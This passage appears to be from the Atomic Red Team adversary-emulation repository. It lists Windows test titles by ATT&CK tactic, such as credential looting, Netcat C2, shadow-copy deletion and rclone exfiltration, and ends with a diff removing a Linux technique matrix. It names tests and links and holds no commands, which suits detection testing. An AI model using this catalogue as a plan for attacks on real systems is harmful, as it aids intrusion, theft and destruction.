- Atomic Test #15: WinPwn - Powersploits privesc checks [windows]
- Atomic Test #16: WinPwn - General privesc checks [windows]
- Atomic Test #17: WinPwn - GeneralRecon [windows]
- Atomic Test #18: WinPwn - Morerecon [windows]
- Atomic Test #19: WinPwn - RBCD-Check [windows]
- Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
- Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
- Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #4: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
- Atomic Test #7: Qakbot Recon [windows]
- Atomic Test #9: DNS Server Discovery Using nslookup [windows]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- Atomic Test #4: Adfind - Enumerate Active Directory OUs [windows]
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
- Atomic Test #6: Get-DomainTrust with PowerView [windows]
- Atomic Test #7: Get-ForestTrust with PowerView [windows]
- Atomic Test #8: TruffleSnout - Listing AD Infrastructure [windows]
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
- Atomic Test #6: Launch DirLister Executable [windows]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #2: Process Discovery - tasklist [windows]
- Atomic Test #3: Process Discovery - Get-Process [windows]
- Atomic Test #4: Process Discovery - get-wmiObject [windows]
- Atomic Test #5: Process Discovery - wmic process [windows]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
- Atomic Test #5: Wmic Group Discovery [windows]
- Atomic Test #6: WMIObject Group Discovery [windows]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- Atomic Test #8: Get-DomainPolicy with PowerView [windows]
- Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
- Atomic Test #10: Use of SecEdit.exe to export the local security policy (including the password policy) [windows]
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #1: Discover System Language by Registry Query [windows]
- Atomic Test #2: Discover System Language with chcp [windows]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- Atomic Test #2: Enumerate COM Objects in Registry with Powershell [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
- Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
- Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
- Atomic Test #1: Remote System Discovery - net [windows]
- Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
- Atomic Test #3: Remote System Discovery - nltest [windows]
- Atomic Test #4: Remote System Discovery - ping sweep [windows]
- Atomic Test #5: Remote System Discovery - arp [windows]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
- Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
- Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
- Atomic Test #18: Get-DomainController with PowerView [windows]
- Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
- Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- Atomic Test #5: WinPwn - spoolvulnscan [windows]
- Atomic Test #6: WinPwn - MS17-10 [windows]
- Atomic Test #7: WinPwn - bluekeep [windows]
- Atomic Test #8: WinPwn - fruit [windows]
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #4: WinPwn - Dotnetsearch [windows]
- Atomic Test #5: WinPwn - DotNet [windows]
- Atomic Test #6: WinPwn - powerSQL [windows]
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
# command-and-control
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #2: XOR Encoded data. [windows]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.004 Application Layer Protocol: DNS](../../T1071.004/T1071.004.md)
- Atomic Test #1: DNS Large Query Volume [windows]
- Atomic Test #2: DNS Regular Beaconing [windows]
- Atomic Test #3: DNS Long Domain Query [windows]
- Atomic Test #4: DNS C2 [windows]
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1219 Remote Access Software](../../T1219/T1219.md)
- Atomic Test #1: TeamViewer Files Detected Test on Windows [windows]
- Atomic Test #2: AnyDesk Files Detected Test on Windows [windows]
- Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
- Atomic Test #4: GoToAssist Files Detected Test on Windows [windows]
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
- Atomic Test #8: NetSupport - RAT Execution [windows]
- Atomic Test #9: UltraViewer - RAT Execution [windows]
- Atomic Test #10: UltraVNC Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1572 Protocol Tunneling](../../T1572/T1572.md)
- Atomic Test #1: DNS over HTTPS Large Query Volume [windows]
- Atomic Test #2: DNS over HTTPS Regular Beaconing [windows]
- Atomic Test #3: DNS over HTTPS Long Domain Query [windows]
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #1: Psiphon [windows]
- Atomic Test #2: Tor Proxy Usage - Windows [windows]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #1: Testing usage of uncommonly used port with PowerShell [windows]
- [T1573 Encrypted Channel](../../T1573/T1573.md)
- Atomic Test #1: OpenSSL C2 [windows]
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
- Atomic Test #1: ICMP C2 [windows]
- Atomic Test #2: Netcat C2 [windows]
- Atomic Test #3: Powercat C2 [windows]
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #1: Malicious User Agents - Powershell [windows]
- Atomic Test #2: Malicious User Agents - CMD [windows]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #7: certutil download (urlcache) [windows]
- Atomic Test #8: certutil download (verifyctl) [windows]
- Atomic Test #9: Windows - BITSAdmin BITS Download [windows]
- Atomic Test #10: Windows - PowerShell Download [windows]
- Atomic Test #11: OSTAP Worming Activity [windows]
- Atomic Test #12: svchost writing a file to a UNC path [windows]
- Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
- Atomic Test #15: File Download via PowerShell [windows]
- Atomic Test #16: File download with finger.exe on Windows [windows]
- Atomic Test #17: Download a file with IMEWDBLD.exe [windows]
- Atomic Test #18: Curl Download File [windows]
- Atomic Test #19: Curl Upload File [windows]
- Atomic Test #20: Download a file with Microsoft Connection Manager Auto-Download [windows]
- Atomic Test #21: MAZE Propagation Script [windows]
- Atomic Test #22: Printer Migration Command-Line Tool UNC share folder into a zip file [windows]
- Atomic Test #23: Lolbas replace.exe use to copy file [windows]
- Atomic Test #24: Lolbas replace.exe use to copy UNC file [windows]
- Atomic Test #25: certreq download [windows]
- Atomic Test #26: Download a file using wscript [windows]
- Atomic Test #28: Nimgrab - Transfer Files [windows]
- Atomic Test #29: iwr or Invoke Web-Request download [windows]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #3: portproxy reg key [windows]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# impact
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1492 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1489 Service Stop](../../T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1531 Account Access Removal](../../T1531/T1531.md)
- Atomic Test #1: Change User Password - Windows [windows]
- Atomic Test #2: Delete User - Windows [windows]
- Atomic Test #3: Remove Account From Domain Admin Group [windows]
- [T1486 Data Encrypted for Impact](../../T1486/T1486.md)
- Atomic Test #5: PureLocker Ransom Note [windows]
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1496 Resource Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1485 Data Destruction](../../T1485/T1485.md)
- Atomic Test #1: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #3: Overwrite deleted data on C drive [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
- Atomic Test #10: Logoff System - Windows [windows]
# initial-access
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1192 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1566.001 Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md)
- Atomic Test #1: Download Macro-Enabled Phishing Attachment [windows]
- Atomic Test #2: Word spawned a command shell and used an IP address in the command line [windows]
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1091 Replication Through Removable Media](../../T1091/T1091.md)
- Atomic Test #1: USB Malware Spread Simulation [windows]
- [T1195 Supply Chain Compromise](../../T1195/T1195.md)
- Atomic Test #1: Octopus Scanner Malware Open Source Supply Chain [windows]
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- T1193 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1194 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
# exfiltration
- [T1567 Exfiltration Over Web Service](../../T1567/T1567.md)
- Atomic Test #1: Data Exfiltration with ConfigSecurityPolicy [windows]
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1020 Automated Exfiltration](../../T1020/T1020.md)
- Atomic Test #1: IcedID Botnet HTTP PUT [windows]
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #1: Exfiltrate data HTTPS using curl windows [windows]
- [T1041 Exfiltration Over C2 Channel](../../T1041/T1041.md)
- Atomic Test #1: C2 Data Exfiltration [windows]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #3: DNSExfiltration (doh) [windows]
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
- Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1022 Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
- Atomic Test #4: Exfiltration Over Alternative Protocol - HTTP [windows]
- Atomic Test #5: Exfiltration Over Alternative Protocol - SMTP [windows]
- Atomic Test #6: MAZE FTP Upload [windows]
- Atomic Test #7: Exfiltration Over Alternative Protocol - FTP - Rclone [windows]
atomics/Indexes/Matrices/linux-matrix.md
-84
View File
@@ -1,84 +0,0 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
| initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact |
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
